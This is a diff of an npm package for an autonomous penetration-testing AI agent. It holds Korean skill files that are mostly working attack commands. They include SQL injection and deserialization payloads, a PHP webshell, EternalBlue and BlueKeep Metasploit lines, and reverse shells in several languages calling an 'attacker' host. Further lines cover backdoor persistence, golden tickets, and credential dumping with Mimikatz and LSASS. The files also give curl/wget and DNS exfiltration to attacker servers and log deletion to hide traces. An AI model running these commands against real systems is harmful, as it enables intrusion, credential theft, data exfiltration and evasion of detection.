pentesting 0.1.0

package/package.json

@@ -0,0 +1,74 @@
+{
+  "name": "pentesting",
+  "version": "0.1.0",
+  "description": "Autonomous Penetration Testing AI Agent powered by Claude",
+  "type": "module",
+  "main": "dist/index.js",
+  "types": "dist/index.d.ts",
+  "bin": {
+    "pentesting": "dist/index.js"
+  },
+  "files": [
+    "dist",
+    "skills",
+    "README.md"
+  ],
+  "scripts": {
+    "dev": "tsx src/index.tsx",
+    "build": "tsup src/index.tsx --format esm --dts --clean",
+    "start": "node dist/index.js",
+    "lint": "tsc --noEmit",
+    "prepublishOnly": "npm run build"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/agnusdei1207/pentesting.git"
+  },
+  "homepage": "https://github.com/agnusdei1207/pentesting#readme",
+  "bugs": {
+    "url": "https://github.com/agnusdei1207/pentesting/issues"
+  },
+  "keywords": [
+    "penetration-testing",
+    "pentesting",
+    "security",
+    "hacking",
+    "hacker",
+    "ai",
+    "autonomous",
+    "claude",
+    "anthropic",
+    "tui",
+    "cli",
+    "nmap",
+    "metasploit",
+    "sqlmap",
+    "kali"
+  ],
+  "author": "agnusdei1207",
+  "license": "MIT",
+  "engines": {
+    "node": ">=18.0.0"
+  },
+  "dependencies": {
+    "@anthropic-ai/sdk": "^0.39.0",
+    "boxen": "^8.0.1",
+    "chalk": "^5.4.1",
+    "commander": "^13.1.0",
+    "figlet": "^1.8.0",
+    "gradient-string": "^3.0.0",
+    "ink": "^5.1.0",
+    "ink-spinner": "^5.0.0",
+    "ink-text-input": "^6.0.0",
+    "nanospinner": "^1.2.2",
+    "ora": "^8.1.1",
+    "react": "^18.3.1"
+  },
+  "devDependencies": {
+    "@types/node": "^22.13.1",
+    "@types/react": "^18.3.18",
+    "tsup": "^8.3.6",
+    "tsx": "^4.19.2",
+    "typescript": "^5.7.3"
+  }
+}

package/skills/initial-access.md

@@ -0,0 +1,205 @@
+---
+name: initial-access
+description: 초기 접근 기법 - 외부에서 내부 네트워크 침투
+---
+
+# Initial Access Skill
+
+외부 공격자 관점에서 타겟 네트워크에 초기 접근하는 기법입니다.
+
+## 🎯 목표
+외부에서 내부 네트워크로 최초 침투 (Initial Foothold)
+
+## 📋 공격 벡터
+
+### 1. 웹 애플리케이션 익스플로잇
+
+#### SQL Injection
+```bash
+# sqlmap 자동화
+sqlmap -u "http://target.com/page?id=1" --batch --dbs
+sqlmap -u "http://target.com/page?id=1" --batch -D dbname --tables
+sqlmap -u "http://target.com/page?id=1" --batch -D dbname -T users --dump
+
+# OS Shell 획득
+sqlmap -u "http://target.com/page?id=1" --os-shell
+
+# 수동 페이로드
+' OR '1'='1
+' UNION SELECT 1,2,3,4,5--
+'; EXEC xp_cmdshell('whoami');--
+```
+
+#### RCE (Remote Code Execution)
+```bash
+# 파일 업로드
+# PHP 웹쉘 업로드
+echo '<?php system($_GET["cmd"]); ?>' > shell.php
+
+# LFI to RCE
+# Log poisoning
+curl "http://target.com/page.php?file=../../../../var/log/apache2/access.log" -A "<?php system('id'); ?>"
+
+# SSRF to RCE
+# 내부 서비스 공격
+curl "http://target.com/fetch?url=http://localhost:8080/admin/exec?cmd=id"
+```
+
+#### Deserialization
+```bash
+# Java
+java -jar ysoserial.jar CommonsCollections5 'bash -c {echo,YmFzaCAtaSA+Ji...}|{base64,-d}|{bash,-i}' > payload.ser
+
+# Python Pickle
+import pickle
+import os
+class RCE:
+    def __reduce__(self):
+        return (os.system, ('id',))
+```
+
+### 2. 외부 서비스 익스플로잇
+
+#### SSH
+```bash
+# 브루트포스
+hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://target
+
+# 키 기반 공격
+ssh-keyscan target > known_hosts
+```
+
+#### SMB
+```bash
+# 익스플로잇 (EternalBlue)
+msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS target; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST attacker; run"
+
+# 고스트 (CVE-2020-0796)
+python3 CVE-2020-0796.py target
+```
+
+#### RDP
+```bash
+# 브루트포스
+hydra -l administrator -P wordlist.txt rdp://target
+
+# BlueKeep (CVE-2019-0708)
+msfconsole -q -x "use exploit/windows/rdp/cve_2019_0708_bluekeep_rce; set RHOSTS target; run"
+```
+
+### 3. 피싱 (Social Engineering)
+
+#### 악성 문서
+```bash
+# Office 매크로
+# VBA 페이로드 생성
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f vba-psh
+
+# HTA 파일
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f hta-psh > evil.hta
+```
+
+#### 링크 기반
+```bash
+# 악성 링크 생성
+# Gophish 또는 SET 사용
+
+# 크레덴셜 하베스팅
+python3 -m http.server 80  # 피싱 페이지 호스팅
+```
+
+### 4. 공급망 공격
+
+#### 패키지 오염
+```bash
+# npm, pip, gem 등 악성 패키지 설치 유도
+# 타이포스쿼팅: requests → reqeusts
+```
+
+### 5. 노출된 관리 인터페이스
+
+#### Tomcat
+```bash
+# 기본 자격증명
+hydra -L users.txt -P passwords.txt target http-get /manager/html
+
+# WAR 배포
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=attacker LPORT=4444 -f war > shell.war
+curl --upload-file shell.war "http://admin:admin@target:8080/manager/text/deploy?path=/shell"
+```
+
+#### Jenkins
+```bash
+# 스크립트 콘솔 RCE
+# Groovy 스크립트
+String host="attacker";
+int port=4444;
+String cmd="/bin/bash";
+Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
+```
+
+#### WordPress
+```bash
+# wpscan
+wpscan --url http://target.com -e u,vp --api-token=xxx
+
+# 취약 플러그인 익스플로잇
+msfconsole -q -x "search wordpress; use exploit/unix/webapp/wp_admin_shell_upload; set RHOSTS target; run"
+```
+
+## 🔄 리버스 쉘
+
+### Bash
+```bash
+bash -i >& /dev/tcp/attacker/4444 0>&1
+```
+
+### Python
+```python
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+```
+
+### PowerShell
+```powershell
+powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
+```
+
+### PHP
+```php
+php -r '$sock=fsockopen("attacker",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
+```
+
+### Netcat
+```bash
+# 대상에서
+nc -e /bin/bash attacker 4444
+
+# -e 없으면
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker 4444 >/tmp/f
+```
+
+## 🛡️ 리스너 설정
+
+```bash
+# Netcat
+nc -lvnp 4444
+
+# Metasploit
+msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST eth0; set LPORT 4444; run"
+
+# pwncat
+pwncat -l 4444
+```
+
+## 📊 쉘 업그레이드
+
+```bash
+# Python PTY
+python -c 'import pty; pty.spawn("/bin/bash")'
+
+# 완전한 TTY
+python -c 'import pty; pty.spawn("/bin/bash")'
+# Ctrl+Z
+stty raw -echo; fg
+export TERM=xterm
+```

package/skills/network-scanning.md

@@ -0,0 +1,87 @@
+---
+name: network-scanning
+description: 네트워크 스캐닝 및 서비스 탐지 스킬
+---
+
+# Network Scanning Skill
+
+네트워크 및 호스트에 대한 종합 스캐닝을 수행합니다.
+
+## 스캔 단계
+
+### 1. 호스트 발견
+```bash
+# ICMP Ping Sweep
+nmap -sn {{network}}/24
+
+# ARP Scan (로컬 네트워크)
+arp-scan -l
+
+# TCP ACK Ping
+nmap -PA {{target}}
+```
+
+### 2. 포트 스캔
+
+#### Quick Scan (상위 1000 포트)
+```bash
+nmap -F -T4 {{target}}
+```
+
+#### Full TCP Scan
+```bash
+nmap -p- -T4 {{target}}
+```
+
+#### Stealth SYN Scan
+```bash
+nmap -sS -T2 {{target}}
+```
+
+#### UDP Scan
+```bash
+nmap -sU --top-ports 100 {{target}}
+```
+
+### 3. 서비스 버전 탐지
+```bash
+nmap -sV -sC {{target}}
+```
+
+### 4. OS 탐지
+```bash
+nmap -O {{target}}
+```
+
+### 5. 취약점 스크립트
+```bash
+nmap --script vuln {{target}}
+nmap --script "safe and default" {{target}}
+```
+
+## 대안 도구
+
+### Masscan (대규모 스캔)
+```bash
+masscan -p1-65535 {{target}} --rate=10000
+```
+
+### RustScan (빠른 스캔)
+```bash
+rustscan -a {{target}} -- -sV -sC
+```
+
+## 결과 분석
+
+각 발견된 서비스에 대해:
+1. 포트/프로토콜
+2. 서비스 이름
+3. 버전 정보
+4. 알려진 취약점 확인
+5. 추가 열거 필요 여부
+
+## 다음 단계
+
+- 각 서비스별 상세 열거
+- CVE 검색 및 매핑
+- 익스플로잇 가능성 평가

package/skills/post-exploitation.md

@@ -0,0 +1,301 @@
+---
+name: post-exploitation
+description: 포스트 익스플로잇 - 지속성, 측면 이동, 데이터 수집
+---
+
+# Post-Exploitation Skill
+
+초기 침투 후 네트워크 내에서 확장하고 목표를 달성하는 기법입니다.
+
+## 🎯 목표
+- 지속적 접근 확보 (Persistence)
+- 측면 이동 (Lateral Movement)
+- 데이터 수집 및 유출 (Data Exfiltration)
+- 목표 달성 (Actions on Objectives)
+
+## 📋 1. 상황 인식 (Situational Awareness)
+
+### Linux
+```bash
+# 시스템 정보
+hostname && whoami && id
+uname -a
+cat /etc/passwd
+cat /etc/shadow 2>/dev/null
+
+# 네트워크
+ip a
+netstat -tulpn
+ss -tulpn
+cat /etc/hosts
+arp -a
+
+# 다른 사용자
+w
+last
+cat /home/*/.bash_history 2>/dev/null
+```
+
+### Windows
+```powershell
+# 시스템 정보
+hostname && whoami && whoami /priv
+systeminfo
+
+# 네트워크
+ipconfig /all
+netstat -ano
+arp -a
+
+# 도메인 정보
+net user /domain
+net group "Domain Admins" /domain
+nltest /dclist:
+```
+
+## 📋 2. 지속성 (Persistence)
+
+### Linux
+```bash
+# SSH 키
+mkdir -p ~/.ssh
+echo "ssh-rsa YOUR_PUBLIC_KEY" >> ~/.ssh/authorized_keys
+chmod 600 ~/.ssh/authorized_keys
+
+# Cron Job
+(crontab -l 2>/dev/null; echo "* * * * * /tmp/backdoor.sh") | crontab -
+
+# Systemd 서비스
+cat > /etc/systemd/system/backdoor.service << EOF
+[Unit]
+Description=Backdoor
+
+[Service]
+ExecStart=/tmp/backdoor.sh
+Restart=always
+
+[Install]
+WantedBy=multi-user.target
+EOF
+systemctl enable backdoor
+systemctl start backdoor
+
+# bashrc
+echo 'bash -i >& /dev/tcp/attacker/4444 0>&1 &' >> ~/.bashrc
+```
+
+### Windows
+```powershell
+# Registry Run Key
+reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"
+
+# Scheduled Task
+schtasks /create /tn "Backdoor" /tr "C:\backdoor.exe" /sc onlogon /ru SYSTEM
+
+# WMI Event Subscription
+$FilterArgs = @{
+    EventNamespace = 'root/cimv2'
+    Name = 'Backdoor'
+    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
+}
+$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $FilterArgs
+
+# 서비스
+sc create Backdoor binPath= "C:\backdoor.exe" start= auto
+
+# 골든 티켓 (도메인 관리자)
+kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:{{krbtgt_hash}} /ticket:golden.kirbi
+```
+
+## 📋 3. 측면 이동 (Lateral Movement)
+
+### SMB 기반
+```bash
+# psexec
+impacket-psexec domain/user:password@target
+impacket-psexec -hashes :{{ntlm_hash}} domain/user@target
+
+# wmiexec
+impacket-wmiexec domain/user:password@target
+
+# smbexec
+impacket-smbexec domain/user:password@target
+
+# CrackMapExec
+crackmapexec smb targets.txt -u user -p password -x 'whoami'
+crackmapexec smb targets.txt -u user -H {{ntlm_hash}} -x 'whoami'
+```
+
+### WinRM
+```powershell
+# PowerShell Remoting
+Enter-PSSession -ComputerName target -Credential domain\user
+
+# Evil-WinRM
+evil-winrm -i target -u user -p password
+evil-winrm -i target -u user -H {{ntlm_hash}}
+```
+
+### SSH
+```bash
+# 키 재사용
+ssh -i id_rsa user@target
+
+# 에이전트 포워딩
+ssh-add ~/.ssh/id_rsa
+ssh -A user@target
+```
+
+### RDP
+```bash
+# xfreerdp
+xfreerdp /u:user /p:password /v:target
+
+# Pass-the-Hash RDP (Restricted Admin Mode)
+xfreerdp /u:user /pth:{{ntlm_hash}} /v:target
+```
+
+## 📋 4. 피벗팅 (Pivoting)
+
+### SSH 터널
+```bash
+# 로컬 포트 포워딩
+ssh -L 8080:internal_target:80 user@pivot_host
+
+# 동적 SOCKS 프록시
+ssh -D 1080 user@pivot_host
+proxychains nmap -sT internal_target
+
+# 리버스 터널
+ssh -R 4444:localhost:4444 user@pivot_host
+```
+
+### Chisel
+```bash
+# 서버 (공격자)
+chisel server -p 8000 --reverse
+
+# 클라이언트 (피해자에서)
+chisel client attacker:8000 R:socks
+# proxychains 설정 후 내부 네트워크 접근
+```
+
+### Ligolo-ng
+```bash
+# 프록시 (공격자)
+ligolo-proxy -selfcert
+
+# 에이전트 (피해자)
+ligolo-agent -connect attacker:11601 -ignore-cert
+
+# 세션 선택 후 터널 시작
+session
+start
+```
+
+### Metasploit
+```bash
+# 라우트 추가
+meterpreter > run autoroute -s 192.168.1.0/24
+
+# SOCKS 프록시
+meterpreter > run auxiliary/server/socks_proxy
+```
+
+## 📋 5. 자격증명 수집
+
+### Linux
+```bash
+# Shadow 파일
+cat /etc/shadow
+
+# SSH 키
+ls -la /home/*/.ssh/
+cat /home/*/.ssh/id_rsa
+
+# 히스토리
+cat /home/*/.bash_history
+cat /root/.bash_history
+
+# 설정 파일
+grep -r "password" /etc/ 2>/dev/null
+find / -name "*.conf" -exec grep -l "password" {} \; 2>/dev/null
+```
+
+### Windows
+```powershell
+# Mimikatz
+sekurlsa::logonpasswords
+sekurlsa::wdigest
+lsadump::sam
+lsadump::lsa /patch
+
+# SAM 덤프
+reg save hklm\sam sam.hive
+reg save hklm\system system.hive
+# secretsdump.py로 추출
+
+# LSASS 덤프
+procdump.exe -ma lsass.exe lsass.dmp
+# mimikatz로 분석
+sekurlsa::minidump lsass.dmp
+sekurlsa::logonpasswords
+
+# DPAPI
+mimikatz dpapi::cred /in:"%appdata%\Microsoft\Credentials\*"
+
+# 브라우저 자격증명
+.\SharpChrome.exe logins
+.\SharpWeb.exe all
+```
+
+## 📋 6. 데이터 유출 (Exfiltration)
+
+### HTTP/HTTPS
+```bash
+# 공격자 서버
+python3 -m http.server 80
+
+# 피해자에서
+curl -F "file=@data.zip" http://attacker/upload
+wget --post-file=data.zip http://attacker/upload
+```
+
+### DNS
+```bash
+# DNSExfiltrator
+python dnsexfiltrator.py -d attacker.com -f data.zip
+```
+
+### 압축 및 암호화
+```bash
+# 데이터 압축
+zip -r -P password data.zip /path/to/data
+tar czvf data.tar.gz /path/to/data
+
+# 암호화
+openssl enc -aes-256-cbc -in data.zip -out data.enc -k password
+```
+
+## 📋 7. 정리 (Cleanup)
+
+```bash
+# Linux
+history -c
+rm ~/.bash_history
+rm /var/log/auth.log
+rm /var/log/secure
+
+# Windows
+wevtutil cl Security
+wevtutil cl System
+wevtutil cl Application
+Remove-Item (Get-PSReadlineOption).HistorySavePath
+```
+
+## ⚠️ 주의사항
+
+- 항상 승인된 범위 내에서 작업
+- 민감 데이터 처리 시 암호화
+- 로그 및 아티팩트 관리
+- 탐지 회피 vs 탐지 가능성 인지